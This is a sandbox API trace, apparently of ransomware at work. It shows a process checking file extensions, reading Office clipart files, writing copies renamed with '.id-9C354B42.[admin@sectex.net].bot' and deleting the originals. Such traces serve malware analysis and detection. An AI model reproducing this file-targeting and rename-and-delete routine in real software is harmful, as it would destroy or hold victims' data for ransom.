	[0169.646] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.646] lstrlenW (lpString=".docx") returned 5
	[0169.646] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.646] lstrlenW (lpString=".pdf") returned 4
	[0169.646] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.646] lstrlenW (lpString=".xls") returned 4
	[0169.646] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.646] lstrlenW (lpString=".xlsx") returned 5
	[0169.646] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.646] lstrlenW (lpString=".ppt") returned 4
	[0169.646] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.646] lstrlenW (lpString=".zip") returned 4
	[0169.646] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.647] lstrlenW (lpString=".rar") returned 4
	[0169.647] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.647] lstrlenW (lpString=".bz2") returned 4
	[0169.647] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.647] lstrlenW (lpString=".7z") returned 3
	[0169.647] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.647] lstrlenW (lpString=".dbf") returned 4
	[0169.647] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.647] lstrlenW (lpString=".1cd") returned 4
	[0169.647] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.647] lstrlenW (lpString=".jpg") returned 4
	[0169.647] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.647] lstrlenW (lpString=".doc") returned 4
	[0169.647] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.647] lstrlenW (lpString=".docx") returned 5
	[0169.647] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.647] lstrlenW (lpString=".pdf") returned 4
	[0169.647] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.647] lstrlenW (lpString=".xls") returned 4
	[0169.647] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.647] lstrlenW (lpString=".xlsx") returned 5
	[0169.647] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.647] lstrlenW (lpString=".ppt") returned 4
	[0169.647] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.647] lstrlenW (lpString=".zip") returned 4
	[0169.647] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.647] lstrlenW (lpString=".rar") returned 4
	[0169.648] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.648] lstrlenW (lpString=".bz2") returned 4
	[0169.648] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.648] lstrlenW (lpString=".7z") returned 3
	[0169.648] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.648] lstrlenW (lpString=".dbf") returned 4
	[0169.648] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.648] lstrlenW (lpString=".1cd") returned 4
	[0169.648] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.648] lstrlenW (lpString=".jpg") returned 4
	[0169.648] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.648] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.648] lstrlenW (lpString="J0157831.WMF") returned 12
	[0169.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157831.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.651] GetFileSizeEx (in: hFile=0x124, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=11396) returned 1
	[0169.651] CloseHandle (hObject=0x124) returned 1
	[0169.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157831.wmf")) returned 0x20
	[0169.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157831.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157831.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.652] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.652] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157831.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.653] GetLastError () returned 0x0
	[0169.653] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2c84, lpOverlapped=0x0) returned 1
	[0169.673] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2c90, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2c90, lpOverlapped=0x0) returned 1
	[0169.674] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.674] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.674] SetEndOfFile (hFile=0x118) returned 1
	[0169.674] CloseHandle (hObject=0x118) returned 1
	[0169.675] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.675] SetEndOfFile (hFile=0x124) returned 1
	[0169.677] CloseHandle (hObject=0x124) returned 1
	[0169.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.677] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157831.wmf")) returned 1
	[0169.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.678] lstrlenW (lpString=".doc") returned 4
	[0169.678] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.678] lstrlenW (lpString=".docx") returned 5
	[0169.678] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0169.678] lstrlenW (lpString=".pdf") returned 4
	[0169.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.678] lstrlenW (lpString=".xls") returned 4
	[0169.678] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.678] lstrlenW (lpString=".xlsx") returned 5
	[0169.678] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0169.678] lstrlenW (lpString=".ppt") returned 4
	[0169.678] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.678] lstrlenW (lpString=".zip") returned 4
	[0169.678] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.678] lstrlenW (lpString=".rar") returned 4
	[0169.678] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.678] lstrlenW (lpString=".bz2") returned 4
	[0169.678] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.678] lstrlenW (lpString=".7z") returned 3
	[0169.678] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.678] lstrlenW (lpString=".dbf") returned 4
	[0169.678] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.679] lstrlenW (lpString=".1cd") returned 4
	[0169.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.679] lstrlenW (lpString=".jpg") returned 4
	[0169.679] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.679] lstrlenW (lpString=".doc") returned 4
	[0169.679] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.679] lstrlenW (lpString=".docx") returned 5
	[0169.679] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0169.679] lstrlenW (lpString=".pdf") returned 4
	[0169.679] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.679] lstrlenW (lpString=".xls") returned 4
	[0169.679] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.679] lstrlenW (lpString=".xlsx") returned 5
	[0169.679] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0169.679] lstrlenW (lpString=".ppt") returned 4
	[0169.679] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.679] lstrlenW (lpString=".zip") returned 4
	[0169.679] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.679] lstrlenW (lpString=".rar") returned 4
	[0169.679] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.679] lstrlenW (lpString=".bz2") returned 4
	[0169.679] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.679] lstrlenW (lpString=".7z") returned 3
	[0169.679] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.679] lstrlenW (lpString=".dbf") returned 4
	[0169.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.679] lstrlenW (lpString=".1cd") returned 4
	[0169.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157831.WMF") returned 63
	[0169.679] lstrlenW (lpString=".jpg") returned 4
	[0169.680] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.680] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.680] lstrlenW (lpString="J0160590.WMF") returned 12
	[0169.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.692] GetFileSizeEx (in: hFile=0x124, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=29406) returned 1
	[0169.692] CloseHandle (hObject=0x124) returned 1
	[0169.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf")) returned 0x20
	[0169.692] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.692] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.692] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.693] GetLastError () returned 0x0
	[0169.693] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x72de, lpOverlapped=0x0) returned 1
	[0169.695] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x72e0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x72e0, lpOverlapped=0x0) returned 1
	[0169.696] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.696] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.696] SetEndOfFile (hFile=0x118) returned 1
	[0169.696] CloseHandle (hObject=0x118) returned 1
	[0169.696] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.696] SetEndOfFile (hFile=0x124) returned 1
	[0169.699] CloseHandle (hObject=0x124) returned 1
	[0169.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.699] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0160590.wmf")) returned 1
	[0169.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.700] lstrlenW (lpString=".doc") returned 4
	[0169.700] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.700] lstrlenW (lpString=".docx") returned 5
	[0169.700] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0169.700] lstrlenW (lpString=".pdf") returned 4
	[0169.700] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.700] lstrlenW (lpString=".xls") returned 4
	[0169.700] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.700] lstrlenW (lpString=".xlsx") returned 5
	[0169.700] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0169.700] lstrlenW (lpString=".ppt") returned 4
	[0169.700] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.700] lstrlenW (lpString=".zip") returned 4
	[0169.700] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.700] lstrlenW (lpString=".rar") returned 4
	[0169.700] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.700] lstrlenW (lpString=".bz2") returned 4
	[0169.700] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.700] lstrlenW (lpString=".7z") returned 3
	[0169.700] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.700] lstrlenW (lpString=".dbf") returned 4
	[0169.701] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.701] lstrlenW (lpString=".1cd") returned 4
	[0169.701] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.701] lstrlenW (lpString=".jpg") returned 4
	[0169.701] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.701] lstrlenW (lpString=".doc") returned 4
	[0169.701] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.701] lstrlenW (lpString=".docx") returned 5
	[0169.701] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0169.701] lstrlenW (lpString=".pdf") returned 4
	[0169.701] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.701] lstrlenW (lpString=".xls") returned 4
	[0169.701] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.701] lstrlenW (lpString=".xlsx") returned 5
	[0169.701] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0169.701] lstrlenW (lpString=".ppt") returned 4
	[0169.701] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.701] lstrlenW (lpString=".zip") returned 4
	[0169.701] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.701] lstrlenW (lpString=".rar") returned 4
	[0169.701] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.701] lstrlenW (lpString=".bz2") returned 4
	[0169.701] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.701] lstrlenW (lpString=".7z") returned 3
	[0169.701] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.701] lstrlenW (lpString=".dbf") returned 4
	[0169.701] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.702] lstrlenW (lpString=".1cd") returned 4
	[0169.702] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0160590.WMF") returned 63
	[0169.702] lstrlenW (lpString=".jpg") returned 4
	[0169.702] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.702] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.702] lstrlenW (lpString="J0168644.WMF") returned 12
	[0169.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.702] GetFileSizeEx (in: hFile=0x124, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=20906) returned 1
	[0169.702] CloseHandle (hObject=0x124) returned 1
	[0169.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf")) returned 0x20
	[0169.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0169.703] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.703] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.704] GetLastError () returned 0x0
	[0169.704] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x51aa, lpOverlapped=0x0) returned 1
	[0169.706] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x51b0, lpOverlapped=0x0) returned 1
	[0169.707] ReadFile (in: hFile=0x124, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.707] WriteFile (in: hFile=0x118, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.707] SetEndOfFile (hFile=0x118) returned 1
	[0169.707] CloseHandle (hObject=0x118) returned 1
	[0169.707] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.707] SetEndOfFile (hFile=0x124) returned 1
	[0169.709] CloseHandle (hObject=0x124) returned 1
	[0169.710] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.710] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0168644.wmf")) returned 1
	[0169.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0168644.WMF") returned 63
	[0169.710] lstrlenW (lpString=".doc") returned 4
	[0169.711] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.711] lstrlenW (lpString=".docx") returned 5
	[0169.711] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0169.711] lstrlenW (lpString=".pdf") returned 4
	[0169.711] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.711] lstrlenW (lpString=".xls") returned 4
	[0169.711] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.711] lstrlenW (lpString=".xlsx") returned 5
	[0169.711] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0169.711] lstrlenW (lpString=".ppt") returned 4
